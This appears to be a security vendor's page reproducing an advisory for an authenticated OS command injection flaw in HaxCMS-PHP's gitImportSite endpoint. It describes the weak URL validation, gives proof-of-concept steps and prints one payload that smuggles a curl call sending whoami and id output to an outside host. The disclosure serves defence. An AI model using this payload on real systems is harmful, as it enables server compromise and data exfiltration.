Launch Week Day 1: Announcing Security Design Review
Start for Free
HIGH 8.5 npm

HaxCMS-PHP Command Injection Vulnerability

GHSA-g4cf-pp4x-hqgw · CVE-2025-49141

Published · Modified

Description

Summary

The 'gitImportSite' functionality obtains a URL string from a POST request and insufficiently validates user input. The ’set_remote’ function later passes this input into ’proc_open’, yielding OS command injection.

Details

The vulnerability exists in the logic of the ’gitImportSite’ function, located in ’Operations.php’. The current implementation only relies on the ’filter_var’ and 'strpos' functions to validate the URL, which is not sufficient to ensure absence of all Bash special characters used for command injection.
gitImportSite

Affected Resources

• Operations.php:2103 gitImportSite()
• <domain>/<user>/system/api/gitImportSite

PoC

To replicate this vulnerability, authenticate and send a POST request to the 'gitImportSite' endpoint with a crafted URL in the JSON data. Note, a valid token needs to be obtained by capturing a request to another API endpoint (such as 'archiveSite').

  1. Start a webserver.
    webserver

  2. Initiate a request to the ’archiveSite’ endpoint.
    archiveSite

  3. Capture and modify the request in BurpSuite.
    request-modification

  4. Observe command output in the HTTP request from the server.
    command-output

Command Injection Payload

http://<IP>/.git;curl${IFS}<IP>/$(whoami)/$(id)#=abcdef

Impact

An authenticated attacker can craft a URL string that bypasses the validation checks employed by the ’filter_var’ and ’strpos’ functions in order to execute arbitrary OS commands on the backend server. The attacker can exfiltrate command output via an HTTP request.

References

Ready to move

Start Securing

Start for Free Get Demo

Free, no credit card | First findings in minutes